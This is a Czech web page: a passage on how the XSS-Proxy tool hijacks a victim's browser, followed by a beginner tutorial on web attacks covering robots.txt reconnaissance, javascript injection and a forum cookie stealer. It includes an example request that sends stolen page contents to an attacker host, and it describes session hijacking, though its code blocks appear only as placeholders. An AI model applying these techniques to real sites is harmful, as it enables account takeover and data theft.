http://utocnik.com subsekvenční skript requesty? Aktuálně se stanou dvě věci:1 – Obsah dokumentu v IFRAME (výsledky innerHTML pro daný objekt) jsou podvrženy do URL v skript requestu. Requesty skriptu jsou pouze GET, takže všechny volání skriptu obětí jsou jako volání normálniho dokumentu a ukládají parm/info na URL za jméno skriptu/stránky. Toto volání skriptu způsobý na serveru útočníka něco jako:GET /xss.js?data=Encoded_innerHTML_Contents HTTP/1.1Je to o něco víc komplexnější než to, že IE limituje délku URL (na přibližně 2049 znaků), takže většina dokumentů bude potřebovat naporcovat na části, které se na skritp URL request budou schopny dát dohromady. Aktuální nástroje se s tímto snaží vypořádat tak, že umísťují do URL dotazů přídavné informace pro znovusestavení (podobně jak to funguje u TCP/IP paketů).2 – Server na http://utocnik.com odpoví na poslední požadavek skriptu s více skirpt příkazy pro zachování trvání. Server buďto odpoví pomocía.) loop requestu (obyčejně řekne oběti počkej pár vteřin, pak znovu zkontroluj zda-li existují další příkazy skriptu)b.) dokument requestu (vlož dokument do IFRAME, přečti ho a přepošli výsledky pokud tě o to skript požádá)c.) submit requestu (nastav hodnoty vstupu ve formuláři s IFRAME, odešli, čekej na odpověď, přečti odpověď přepošli výsldek zpátky pokud o to skript požádá).Nebo pomocí javascript var/funkce požadavek na vyhodonocení (vyhodnoť výraz uvnitř aktuálniho okna v prohlížeči oběti a vrať výsledek+get příkazy). Proces pokračuje tak dloho jak oběť setrváva na stejné stránce.Zde je ASCII vizualizace okna a vysvětlení v souvislostech s cílem útočníka, po tom co je oběť přesměrována na finálni cíl a inicializován únos session:Existuje řada metod pro zamaskování aktuálniho „rezidentního“ okna pro útok (attack window) nebo IFRAME zaváděče. Celé okno lze schovat, stejně tak zrušit původní obsah stránek nebo proste použít skrytý IFRAME. Nástroj XSS-Proxy o kterém mluvíme, necháva okno včetně IFRAME pro oběť viditelné, ale modifikace je triviální (třeba interaktivně s Javascript Eval from). Existují i metody jak donutiti uživatele otevřít nové okno a obejít blokování pop-up oken. Jak? XSS proces přepíše odkazy v originálním dokumentu a otevření okne je pak pouze otázkou kliku. Nové oknomůže být kopii (zrcadlem) toho co si uživatel právě prohlíží, nebo výsledek odkliknutého odkazu ve veřejném XSS dokumentu a zmanipuluje oběť tak, že okno kontrolované XSS nechá běžet když dál surfuje.

folder_openPřiřazené štítky

Základy hackování webových stránek

access_time16.červen 2020personRedakce

Tento text je ucelený soubor metod útoku na web. Jsou zde popsány základní principy důležité k pochopení jak takové napadnutí webové stránky může vypadat, což vám může pomoci v zabezpečení vaší webové stránky. Učit se čistě konkrétní útoky na web bez znalosti funkčnosti a vnímání souvislostí je zbytečné, na to jsou dobří boti ne lidí. Umění průniků je znalost tématu, ne použití programu s tlačítkem „háčkuj“.Základní princip útoku je získání informace. Je dobré vědět na co útočíte a jaké máte možnosti. To znamená například zjistit si jaká aplikace se za zobrazovanou stránkou skrývá nebo jaká je configurace serveru. To vede k dalšímu kroku, jak je obstarání exploitu, zdrojového kódu konkrétní webové aplikace nebo útok metodou pokus omyl. Možností je víc než dost. Konkrétní banální příklad získání kritické informace může vypadat třeba takto. Webstranka na doméně www.spatnastranka.cz má vlastní redakční systém na správu obsahu stránky. Tím odpadá možnost použití exploitu pro již nalezenou chybu nebo obstarání zdrojového kódu. Proto útočník zkusí štěstí. Podívá se jestli je na serveru soubor robots.txt. Tento soubor na serveru ani nemusí být, jde totiž o soupis pravidel pro indexovaci roboty kteří mapují stránky. Například Google robot. Webmaster do robots.txt vloží pravidlo Disallow pro objekty které nechce aby robot zaznamenal a posléze zveřejnil. Ale protože útočník se žádnými pravidli neřídí, této informace zneužije. Takže dejme tomu že obsah na www.spatnastranka.cz/robotx.txt je Disallow: /admin. Tím se útočník dozví kterou složku nebo soubor webmaster nechce světu ukázat. Přístupem na www.spatnastranka.cz/admin může být útočník extrémně příjemně překvapen nezaheslovaným administračním systémem a když ne, aspoň bude vědět kam dál směřovat své kroky. Další možné „blbé“ soubory: phpinfo.php test.php config.inc mysql.inc …JavascriptJde o nástroj určený k modifikaci stránky během zobrazování. Vkládání javascriptu není jen záležitostí autora stránky. Prohlížeč načítá všechny soubory na které stránka odkazuje a celá stránka se pak prohlíží z lokálních dat, včetně javascriptu. To dává příležitost k tomu aktivně pracovat s obsahem.Nejjednodusi vložení vlastiho scriptu do stránky na kterou se útočí je přímo přes prohlížeč. Script se vloží do panelu adresy kde se normálně píše url.1XXXXXXXXXXXXXXXX1Díky tomu je možné měnit i obsah hodnot ve formulářích které se normálně editovat nedají jako schované nebo zakázané. Konkrétní banální příklad javascript injection. Registrační formulář na stráncehttp://spatnastranka.cz/registrace.php je hlídaný javascriptem aby uživatel mohl zadávat jen znaky abecedy a čísla, ostatní znaky smaže. To je samozřejmě chyba.2XXXXXXXXXXXXXXXX1Zdroják:3XXXXXXXXXXXXXXXX1Syntaxe javascriptu umožňuje zapsat cokoliv do jednoho řádku. To dává útočníkovi větší sílu. Dejme tomu že položka jméno je ve stavu kdy do ní nelze zapisovat a tudíž měnit ji. Tímto scriptem ji lze povolit k editaci.4XXXXXXXXXXXXXXXX1Rozšířené využití tohoto útoku než jen malé změny na stránce, je například protlačení scriptu jako položky formuláře která se zobrazuje i ostatním uživatelům. Ale o tom už v XSS. Pro lepší zvládnutí Javascript injection je dobré se aspoň trochu orientovat v Javascriptu, viz http://w3.orghttp://w3schools.com http://developer.mozilla.org/en/docs/JavaScriptXSSPokročilejší technika útoku s javascriptem. Cílem útočníka je spustit script u své oběti. Toho docílí tak že script zakomponuje na stránku kterou si oběť zobrazí a tím ho spustí. Script by měl být nenápadný a efektivní. To znamená co nejméně kódu k požadovanému efektu. Data která skript získá musí uložit na místo které je útočníkovi přístupné. Utocnik tak může získat informace o uzovateli a dále je použit. Aby script byl účinný musí být vložen na stránku se kterou má oběť nějaký vztah. Například administartor fóra. Admin aby mohl spravovat fórum musí se přihlásit, po přihlášení obdrží identifikační data díky kterým fórum zase pozná že uživatel s těmito daty je amdin. Ano, útočník chce získat datakterá dostal admin aby se za něj mohl vydávat. V předcházející kapitole o Javascriptu jste si mohli všimnout že Javascript pracuje pouze s daty patřícími k zobrazované stránce. Proto musí být útočníkův script spuštěn na stránce fóra. Způsobu vložení scriptu je víc, záleží jen od neznalosti autora stránky aznalosti útočníka. Pokud fórum nekontroluje příspěvky proti scriptum, zde může být potenciální bezpečnostní chyba. Jiná možnost je zakomponovat script do adresy stránky. Adresa totiž může obsahovat data se kterými stránka dále pracuje a je možnost že je vkládá do zdrojového kódu stránky.Příklad. Předpokládejme že jde o nám již známou chybu. Fórum na adrese http://spatnastranka.cz/forum/ je veřejné fórum kde se může registrovat každý a identifikační data se ukládají do takzvané cookie „sušenky“. Obsah cookie si pamatuje prohlížeč, tzn. data jsou uložena lokálně u uživatele. Fórum naštěstí pro útočníka nekontroluje ke které IP jaké cookie patří. Utocnik se zaregistrujea vyzkouší v nenápadném tmavém koutu fóra jestli lze do stránky vložit script. Do pole příspěvku vloží například kód:5XXXXXXXXXXXXXXXX1a odešle jej. Zobrazí si svůj příspěvek a vyskočí okno s textem ‘hloupá chyba’, script se spustil. Smaže příspěvek a nachystá si něco lepisho. Třeba cookie stealer. Ten funguje tak že script ze stránky přesměruje uživatele na útočníkův script který si uloží data nebohého uživatele. Cookie stealer může vypadat například takto:6XXXXXXXXXXXXXXXX1Kód je pouze ilustrativní. Jde o velice nešikovný cookiestealer protože dochází k přesměrování a uživateli to bude podezřelé. Nicméně svůj účel to splní. Další velice důležitá část je přesměrování obsahu cookie od uživatele k útočníkovu scriptu. Toho docílíme javascriptem umístěným na fóru.7XXXXXXXXXXXXXXXX1A to je vše. Uživatel si zobrazí útočníkův příspěvek a najednou kouká na úplně jinou stránku. Oběť je zmatená a útočník má data potřebná k tomu aby se za něj mohl vydávat.

folder_openPřiřazené štítky